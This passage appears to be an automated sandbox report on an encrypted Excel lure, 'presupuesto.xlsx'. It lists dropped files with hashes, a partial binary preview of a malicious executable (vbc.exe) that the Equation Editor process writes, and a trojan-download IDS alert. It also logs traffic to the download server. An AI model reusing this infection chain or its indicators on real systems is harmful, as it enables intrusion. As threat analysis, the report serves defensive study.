                                        Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EE298F3.jpeg
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                        Category:dropped
                                        Size (bytes):8815
                                        Entropy (8bit):7.944898651451431
                                        Encrypted:false
                                        SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                        MD5:F06432656347B7042C803FE58F4043E1
                                        SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                        SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                        SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                        Malicious:false
                                        Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EF4BADDD.jpeg
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 550x310, frames 3
                                        Category:dropped
                                        Size (bytes):29499
                                        Entropy (8bit):7.667442162526095
                                        Encrypted:false
                                        SSDEEP:384:ac8UyN1qqyn7FdNfzZY3AJ0NcoEwa4OXyTqEunn9k+MPiEWsKHBm8oguHh9kt98g:p8wn7TNfzZ0NcnwR6kvKPsPWghY6g
                                        MD5:4FBDDF16124B6C9368537DF70A238C14
                                        SHA1:45E34D715128C6954F589910E6D0429370D3E01A
                                        SHA-256:0668A8E7DA394FE73B994AD85F6CA782F6C09BFF2F35581854C2408CF3909D86
                                        SHA-512:EA17593F175D49792629EC35320AD21D5707CB4CF9E3A7B5DA362FC86AF207F0C14059B51233C3E371F2B7830EAD693B604264CA50968891B420FEA2FC4B29EC
                                        Malicious:false
                                        Preview: ......JFIF.............C....................................................................C.......................................................................6.&.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...0.F...GEH.[....^......Z]k?B..]...A.....q.<..].c....G....Z}.....=.y1.......x->.=.....<.........<..E....a.L...h.c....O..e..a.L...h.c....O..e..a.L...k/_..Mf.[.o.@C(..k^..P..l8........${..Ly.)..'".....N)." .$e.a....-....B.{.\f...).%a.J..>.9b.X..V.%i.Q....%h.V.E...X..V..Q..GQRR?A..!..;.g..B...2..u..W............'..kN.X.,Fy+G...(.r.g..y+O..X.,Fy+H.#)_,...%.r.9Q
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F29F3B0E.jpeg
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                        Category:dropped
                                        Size (bytes):8815
                                        Entropy (8bit):7.944898651451431
                                        Encrypted:false
                                        SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                        MD5:F06432656347B7042C803FE58F4043E1
                                        SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                        SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                        SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                        Malicious:false
                                        Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FA2D9658.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):50311
                                        Entropy (8bit):7.960958863022709
                                        Encrypted:false
                                        SSDEEP:768:hfo72tRlBZeeRugjj8yooVAK92SYAD0PSsX35SVFN0t3HcoNz8WEK6Hm8bbxXVGx:hf0WBueSoVAKxLD06w35SEVNz8im0AEH
                                        MD5:4141C7515CE64FED13BE6D2BA33299AA
                                        SHA1:B290F533537A734B7030CE1269AC8C5398754194
                                        SHA-256:F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
                                        SHA-512:74E9927BF0C6F8CB9C3973FD68DAD12B422DC4358D5CCED956BC6A20139B21D929E47165F77D208698924CB7950A7D5132953C75770E4A357580BF271BD9BD88
                                        Malicious:false
                                        Preview: .PNG........IHDR.......].......^....gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....bKGD..............oFFs.......F.#-nT....pHYs...%...%.IR$.....vpAg.......0...O.....IDATx...h.w....V!...D.........4.p .X(r..x.&..K.(.L...P..d5.R......b.......C...BP...,% ....qL.,.!E.ni..t......H._......G..|~=.....<..#.J!.N.a..a.Q.V...t:.M.v;=..0.s..ixa...0..<...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..qM../.u....h6..|.22..g4M.........C.u..y,--..'....a.?~.W.\i.>7q.j..y....iLNN.....5\..w"..b~~...J.sssm.d.Y.u.G....s.\..R.`qq.....C;..$..&..2..x..J..fgg...]=g.Y.y..N..(SN.S8.eZ.T...=....4.?~..uK.;....SSS...iY.Q.n.I.u\.x..o.,.av.N.(..H..B..X......... ..amm...h4.t:..].j..tz[.(..#..}yy./..".z.-[!4....a...jj......,dY.7.|.F.....\.~.g.....x..Y...R..\.....w.\.h..K....h..nM
                                        C:\Users\user\AppData\Local\Temp\CabE532.tmp
                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                                        Category:dropped
                                        Size (bytes):58596
                                        Entropy (8bit):7.995478615012125
                                        Encrypted:true
                                        SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                                        MD5:61A03D15CF62612F50B74867090DBE79
                                        SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
                                        SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
                                        SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                                        Malicious:false
                                        Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
                                        C:\Users\user\AppData\Local\Temp\TarE533.tmp
                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):152788
                                        Entropy (8bit):6.309740459389463
                                        Encrypted:false
                                        SSDEEP:1536:TIz6c7xcjgCyrYBZ5pimp4Ydm6Caku2Dnsz0JD8reJgMnl3rlMGGv:TNqccCymfdmoku2DMykMnNGG0
                                        MD5:4E0487E929ADBBA279FD752E7FB9A5C4
                                        SHA1:2497E03F42D2CBB4F4989E87E541B5BB27643536
                                        SHA-256:AE781E4F9625949F7B8A9445B8901958ADECE7E3B95AF344E2FCB24FE989EEB7
                                        SHA-512:787CBC262570A4FA23FD9C2BA6DA7B0D17609C67C3FD568246F9BEF2A138FA4EBCE2D76D7FD06C3C342B11D6D9BCD875D88C3DC450AE41441B6085B2E5D48C5A
                                        Malicious:false
                                        Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........|h....210303062855Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                        C:\Users\user\Desktop\~$presupuesto.xlsx
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):330
                                        Entropy (8bit):1.4377382811115937
                                        Encrypted:false
                                        SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                        MD5:96114D75E30EBD26B572C1FC83D1D02E
                                        SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                        SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                        SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                        Malicious:true
                                        Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                        C:\Users\Public\vbc.exe
                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:modified
                                        Size (bytes):657408
                                        Entropy (8bit):7.451139683312535
                                        Encrypted:false
                                        SSDEEP:12288:ZGjq53LgC5jKNlUT2AMav4dJjSe3X/QuNaP9NLQubuKZWZn:4GngNlUT2ANYXouNaP9NHxWZn
                                        MD5:D5A549B16706948E4355EB89A93CEDEB
                                        SHA1:09F26A7F83C70109C89AB50BB0B9B05C9FF18C84
                                        SHA-256:4AF00CBA0575FD3AB00F392EB47DCB31CFDE4B640B22CA08AAF847357C17044D
                                        SHA-512:7F239D783C99337DD8A2F1C7611E818CD20CB1F92FA9AA789AF550DDE354ED46A9F2DB420485BC4EF4F72085E76CD5D11D12D3AEC93B320A3CFCE63869A21FCA
                                        Malicious:true
                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....s`..............P..P...........o... ........@.. .......................`............@..................................o..O...........................@....................................................... ............... ..H............text....P... ...P.................. ..`.rsrc...............R..............@..@.reloc.......@......................@..B.................o......H.......................h...(............................................0............($...(%.........(.....o&....*.....................('......((......()......(*......(+....*N..(....o....(,....*&..(-....*.s.........s/........s0........s1........s2........*....0...........~....o3....+..*.0...........~....o4....+..*.0...........~....o5....+..*.0...........~....o6....+..*.0...........~....o7....+..*.0..<........~.....(8.....,!r...p.....(9...o:...s;............~.....+..*.0......

                                        Static File Info

                                        General

                                        File type:CDFV2 Encrypted
                                        Entropy (8bit):7.949056229996048
                                        TrID:
                                        • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                        File name:presupuesto.xlsx
                                        File size:414720
                                        MD5:3e12d73850e8d9123f410160888583fc
                                        SHA1:85538a2279ad0a55a62a90661dc1f6f9e7c1f461
                                        SHA256:be48e27318c1fa71231553d56d22eeee70e1fb66e0cdc9bcfcaddac95cf7763c
                                        SHA512:b86c80215a155c46f43d2ae2b33e4f7c3b771f71ed7dca4d90e08c6421feb212fefe3a5e15fdfd52a8269e6642a23ba3b5ebd49e46f0b18d421ba7a1c8b7d5c2
                                        SSDEEP:6144:MqXlxQhAy6S8pK0/UkW8RQH5TyPwTQoUXu18/LvzI7KvhGmUyhSrfz4rYM25e/e1:flxmH2XsLrHIwTOu18/OYUmTSb0rYMb
                                        File Content Preview:........................>......................................................................................................................................................................................................................................

                                        File Icon

                                        Icon Hash:e4e2aa8aa4b4bcb4

                                        Static OLE Info

                                        General

                                        Document Type:OLE
                                        Number of OLE Files:1

                                        OLE File "presupuesto.xlsx"

                                        Indicators

                                        Has Summary Info:False
                                        Application Name:unknown
                                        Encrypted Document:True
                                        Contains Word Document Stream:False
                                        Contains Workbook/Book Stream:False
                                        Contains PowerPoint Document Stream:False
                                        Contains Visio Document Stream:False
                                        Contains ObjectPool Stream:
                                        Flash Objects Count:
                                        Contains VBA Macros:False

                                        Streams

                                        Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                        General
                                        Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                        File Type:data
                                        Stream Size:64
                                        Entropy:2.73637206947
                                        Base64 Encoded:False
                                        Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                        Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                        Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                        General
                                        Stream Path:\x6DataSpaces/DataSpaceMap
                                        File Type:data
                                        Stream Size:112
                                        Entropy:2.7597816111
                                        Base64 Encoded:False
                                        Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                        Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                        Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                        General
                                        Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                        File Type:data
                                        Stream Size:200
                                        Entropy:3.13335930328
                                        Base64 Encoded:False
                                        Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                        Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                        Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                        General
                                        Stream Path:\x6DataSpaces/Version
                                        File Type:data
                                        Stream Size:76
                                        Entropy:2.79079600998
                                        Base64 Encoded:False
                                        Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                        Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                        Stream Path: EncryptedPackage, File Type: data, Stream Size: 399544
                                        General
                                        Stream Path:EncryptedPackage
                                        File Type:data
                                        Stream Size:399544
                                        Entropy:7.99943007922
                                        Base64 Encoded:True
                                        Data ASCII:. . . . . . . . . S . . . 8 F . M P . . . . \\ . r . . . . . . r . X . p V . F . . . . . . . P . . ` I . . . . . . t - $ . g . . 4 . . m . h R m . ^ . . a g . p . . . . = . . m . ^ . . a g . p . . . . = . . m . ^ . . a g . p . . . . = . . m . ^ . . a g . p . . . . = . . m . ^ . . a g . p . . . . = . . m . ^ . . a g . p . . . . = . . m . ^ . . a g . p . . . . = . . m . ^ . . a g . p . . . . = . . m . ^ . . a g . p . . . . = . . m . ^ . . a g . p . . . . = . . m . ^ . . a g . p . . . . = . . m . ^ . . a g .
                                        Data Raw:ab 18 06 00 00 00 00 00 f7 53 c8 1a a4 38 46 bf 4d 50 0d d6 df 9c 5c ca 72 85 a8 db eb f4 fa 72 d5 58 df 70 56 15 46 b6 20 92 c2 9d ce 11 fc 50 df b9 60 49 b9 82 bd 0a ed bd 74 2d 24 1f 67 c6 e0 34 d0 bd 6d 01 68 52 6d ef 5e a7 09 61 67 ff 70 f2 99 18 99 3d ab fe 6d ef 5e a7 09 61 67 ff 70 f2 99 18 99 3d ab fe 6d ef 5e a7 09 61 67 ff 70 f2 99 18 99 3d ab fe 6d ef 5e a7 09 61 67 ff
                                        Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                        General
                                        Stream Path:EncryptionInfo
                                        File Type:data
                                        Stream Size:224
                                        Entropy:4.52436504249
                                        Base64 Encoded:False
                                        Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . n . b . . 1 S . t @ . . . x z W . . o u q k y | 3 . 0 0 ' . . . . . R # t . . . . J . k . . 6 . . O . 9 . . $ . . } . . b . . . . .
                                        Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                        Network Behavior

                                        Snort IDS Alerts

                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                        04/12/21-11:28:38.419983TCP2022550ET TROJAN Possible Malicious Macro DL EXE Feb 20164916880192.168.2.22103.153.76.181

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Apr 12, 2021 11:28:36.215269089 CEST49165443192.168.2.2252.59.165.42
                                        Apr 12, 2021 11:28:36.257164955 CEST4434916552.59.165.42192.168.2.22
                                        Apr 12, 2021 11:28:36.259582043 CEST49165443192.168.2.2252.59.165.42
                                        Apr 12, 2021 11:28:36.266201019 CEST49165443192.168.2.2252.59.165.42
                                        Apr 12, 2021 11:28:36.307452917 CEST4434916552.59.165.42192.168.2.22
                                        Apr 12, 2021 11:28:36.309986115 CEST4434916552.59.165.42192.168.2.22
                                        Apr 12, 2021 11:28:36.310020924 CEST4434916552.59.165.42192.168.2.22
                                        Apr 12, 2021 11:28:36.310041904 CEST4434916552.59.165.42192.168.2.22
                                        Apr 12, 2021 11:28:36.310086012 CEST49165443192.168.2.2252.59.165.42
                                        Apr 12, 2021 11:28:36.310110092 CEST49165443192.168.2.2252.59.165.42
                                        Apr 12, 2021 11:28:36.319376945 CEST49165443192.168.2.2252.59.165.42
                                        Apr 12, 2021 11:28:36.362718105 CEST4434916552.59.165.42192.168.2.22
                                        Apr 12, 2021 11:28:36.362819910 CEST49165443192.168.2.2252.59.165.42
                                        Apr 12, 2021 11:28:38.050049067 CEST49165443192.168.2.2252.59.165.42
                                        Apr 12, 2021 11:28:38.107943058 CEST4434916552.59.165.42192.168.2.22
                                        Apr 12, 2021 11:28:38.108131886 CEST49165443192.168.2.2252.59.165.42
                                        Apr 12, 2021 11:28:38.186090946 CEST4916880192.168.2.22103.153.76.181
                                        Apr 12, 2021 11:28:38.419648886 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:38.419732094 CEST4916880192.168.2.22103.153.76.181
                                        Apr 12, 2021 11:28:38.419982910 CEST4916880192.168.2.22103.153.76.181
                                        Apr 12, 2021 11:28:38.654712915 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:38.654743910 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:38.654756069 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:38.654768944 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:38.654948950 CEST4916880192.168.2.22103.153.76.181
                                        Apr 12, 2021 11:28:38.890331984 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:38.890372992 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:38.890391111 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:38.890414000 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:38.890436888 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:38.890458107 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:38.890480995 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:38.890503883 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:38.890549898 CEST4916880192.168.2.22103.153.76.181
                                        Apr 12, 2021 11:28:38.893718004 CEST4916880192.168.2.22103.153.76.181
                                        Apr 12, 2021 11:28:39.124576092 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:39.124608040 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:39.124620914 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:39.124636889 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:39.124654055 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:39.124670029 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:39.124686003 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:39.124702930 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:39.125066996 CEST4916880192.168.2.22103.153.76.181
                                        Apr 12, 2021 11:28:39.127840996 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:39.127861977 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:39.127877951 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:39.127893925 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:39.127912045 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:39.127927065 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:39.127943993 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:39.127959967 CEST8049168103.153.76.181192.168.2.22
                                        Apr 12, 2021 11:28:39.131738901 CEST4916880192.168.2.22103.153.76.181
                                        Apr 12, 2021 11:28:39.131762028 CEST4916880192.168.2.22103.153.76.181
                                        Apr 12, 2021 11:28:39.131766081 CEST4916880192.168.2.22103.153.76.181
                                        Apr 12, 2021 11:28:39.131768942 CEST4916880192.168.2.22103.153.76.181
                                        Apr 12, 2021 11:28:39.131771088 CEST4916880192.168.2.22103.153.76.181
                                        Apr 12, 2021 11:28:39.131773949 CEST4916880192.168.2.22103.153.76.181
                                        Apr 12, 2021 11:28:39.131777048 CEST4916880192.168.2.22103.153.76.181
                                        Apr 12, 2021 11:28:39.131779909 CEST4916880192.168.2.22103.153.76.181
